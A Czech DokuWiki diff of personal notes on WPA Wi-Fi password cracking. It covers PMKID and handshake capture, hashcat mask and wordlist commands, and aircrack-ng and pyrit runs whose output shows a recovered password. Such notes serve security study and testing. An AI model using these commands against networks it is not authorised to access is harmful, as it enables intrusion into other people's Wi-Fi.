Uživatelské nástroje

Nástroje pro tento web


wpa

Rozdíly

Zde můžete vidět rozdíly mezi vybranou verzí a aktuální verzí dané stránky.

Odkaz na výstup diff

Obě strany předchozí revizePředchozí verze
Následující verze
Předchozí verze
wpa [2022/06/02 10:33] djbuldogwpa [2025/08/28 10:09] (aktuální) – upraveno mimo DokuWiki 127.0.0.1
Řádek 12: Řádek 12:
     * nerealne dekodovat alfa znaky 8+     * nerealne dekodovat alfa znaky 8+
       * 8 malých písmen (26^8) cca 4.5 dne       * 8 malých písmen (26^8) cca 4.5 dne
 +
 +  * nejprve je potřeba zachytit handshake
 +  * existuje ale i nová (2018) varianta útoku, zachycení PMKID, která nevyžaduje připojeného klienta
 +    * https://www.hackers-arise.com/post/wi-fi-hacking-part-11-the-pmkid-attack
 +    * https://kalitut.com/pmkid-attack/
 +    * aircrack to umí od verze 1.6?
 +
   * tkiptun-ng utok...   * tkiptun-ng utok...
      * nutno pouzit verzi alespon Aircrack-ng 1.0 rc2 r1396      * nutno pouzit verzi alespon Aircrack-ng 1.0 rc2 r1396
Řádek 17: Řádek 24:
      * testovane signaly.. AP pwr 40, klient 10-20      * testovane signaly.. AP pwr 40, klient 10-20
  
-  * online služba na crack WPA - [[https://gpuhash.me|gpuhash.me]] +  * útok přes [[WPS]] 
-    * basic sada je zdarma, trvá 15 minut, platí se pouze pokud nalezne heslo+ 
 +  * online služba na crack WPA 
 +    * https://wpa-sec.stanev.org/?nets 
 +      * zdarma, pro vedecke ucely 
 +    * [[https://gpuhash.me|gpuhash.me]] 
 +      * basic sada je zdarma, trvá 15 minut, platí se pouze pokud nalezne heslo
  
   * WPA handshake capture + offline crack   * WPA handshake capture + offline crack
Řádek 35: Řádek 47:
       * integrovaný generátor hesel podle předpisu       * integrovaný generátor hesel podle předpisu
       * na i5-7600k + 3060 TI je 2x rychlejší než pyrit (221 kH/s vs 533 kH/s)       * na i5-7600k + 3060 TI je 2x rychlejší než pyrit (221 kH/s vs 533 kH/s)
-    * **Wifite** - framework v python pro jednodušší útok+    * Wifite - framework v python pro jednodušší útok
  
 ==== HashCat ==== ==== HashCat ====
Řádek 45: Řádek 57:
     * .hc22000 - aktuální plaintext formát     * .hc22000 - aktuální plaintext formát
  
-  * [[https://hashcat.net/cap2hashcat/|online cap2hashcat]] konvertor+  * lze vygenerovat programem hcxpcapngtool z hcxtools 
 + 
 +  hcxpcapngtool Patrik-01.cap  -o Patrik.hc22000 
 + 
 +  * alternativně lze použít [[https://hashcat.net/cap2hashcat/|online cap2hashcat]] konvertor
  
   * režimy   * režimy
Řádek 66: Řádek 82:
  
   hashcat -m 22000 -w3 Patrik.hc22000 -a3 ?d?d?d?d?d?d?d?d   hashcat -m 22000 -w3 Patrik.hc22000 -a3 ?d?d?d?d?d?d?d?d
 +  hashcat -m 22000 -w3 Patrik.hc22000 ../../WPA-utok/slovniky/alls_final
  
   * výsledek se vypíše na obrazovku a uloží do potfile   * výsledek se vypíše na obrazovku a uloží do potfile
Řádek 71: Řádek 88:
  
   rm /home/djbuldog/.local/share/hashcat/hashcat.potfile   rm /home/djbuldog/.local/share/hashcat/hashcat.potfile
-==== Slovníkový útok ==== 
- 
-  * http://sourceforge.net/projects/crunch-wordlist/ 
- 
-  * lze použit aircrack-ng 
-    * ve std. verzi podporuje pouze CPU (obe jadra) 
-    * nezaleží na konci řádků souboru, zda jsou CR+LF nebo jen LF 
-    * ukázka spuštění aircracku 
- 
-<code> 
-$ aircrack-ng ~/Desktop/handshake-NETGEARmt.cap \ 
-              -w ~/Desktop/slovniky/newbigslovnik_proWPA_paaswordy.net/cutted8uniqsortedall_unix 
-</code> 
- 
-  * lze použít piryt 
-     * podporuje CPU (obe jadra) + GPU (CUDA, stream a dokonce i jen OpenGL) + LAN (vice klientu) 
-     * nezaleží na konci řádků souboru, zda jsou CR+LF nebo jen LF 
-  * ukázka pyrit 
- 
-<code> 
-$ pyrit -r ~/Desktop/handshake-NETGEARmt.cap \ 
-                          -i ~/Desktop/slovniky/newbigslovnik_proWPA_paaswordy.net/cutted8uniqsortedall_unix \ 
-                          attack_passthrough 
-Pyrit 0.3.0 (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com 
-This code is distributed under the GNU General Public License v3+ 
- 
-Parsing file '/home/djbuldog/Desktop/handshake-NETGEARmt.cap' (1/1)... 
-1634 packets (1634 802.11-packets), 1 APs 
- 
-Picked AccessPoint 00:22:3f:14:e5:ba ('NETGEARmt') automatically. 
-Tried 200010 PMKs so far; 4711 PMKs per second. 
- 
-The password is 'computer'. 
-</code> 
- 
  
 ==== Pyrit ==== ==== Pyrit ====
Řádek 224: Řádek 206:
 #1: 'CUDA-Device #1 'GeForce GTX 1070 Ti'': 195886.7 PMKs/s (RTT 0.7) #1: 'CUDA-Device #1 'GeForce GTX 1070 Ti'': 195886.7 PMKs/s (RTT 0.7)
 </code> </code>
 +
 +==== Slovníkový útok ====
 +
 +  * http://sourceforge.net/projects/crunch-wordlist/
 +
 +  * lze použit aircrack-ng
 +    * ve std. verzi podporuje pouze CPU (obe jadra)
 +    * nezaleží na konci řádků souboru, zda jsou CR+LF nebo jen LF
 +    * ukázka spuštění aircracku
 +
 +<code>
 +$ aircrack-ng ~/Desktop/handshake-NETGEARmt.cap \
 +              -w ~/Desktop/slovniky/newbigslovnik_proWPA_paaswordy.net/cutted8uniqsortedall_unix
 +</code>
 +
 +  * lze použít piryt
 +     * podporuje CPU (obe jadra) + GPU (CUDA, stream a dokonce i jen OpenGL) + LAN (vice klientu)
 +     * nezaleží na konci řádků souboru, zda jsou CR+LF nebo jen LF
 +  * ukázka pyrit
 +
 +<code>
 +$ pyrit -r ~/Desktop/handshake-NETGEARmt.cap \
 +                          -i ~/Desktop/slovniky/newbigslovnik_proWPA_paaswordy.net/cutted8uniqsortedall_unix \
 +                          attack_passthrough
 +Pyrit 0.3.0 (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com
 +This code is distributed under the GNU General Public License v3+
 +
 +Parsing file '/home/djbuldog/Desktop/handshake-NETGEARmt.cap' (1/1)...
 +1634 packets (1634 802.11-packets), 1 APs
 +
 +Picked AccessPoint 00:22:3f:14:e5:ba ('NETGEARmt') automatically.
 +Tried 200010 PMKs so far; 4711 PMKs per second.
 +
 +The password is 'computer'.
 +</code>
 +
 +
  
 ==== tkiptun-ng ==== ==== tkiptun-ng ====
wpa.1654158791.txt.gz · Poslední úprava: (upraveno mimo DokuWiki)

Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki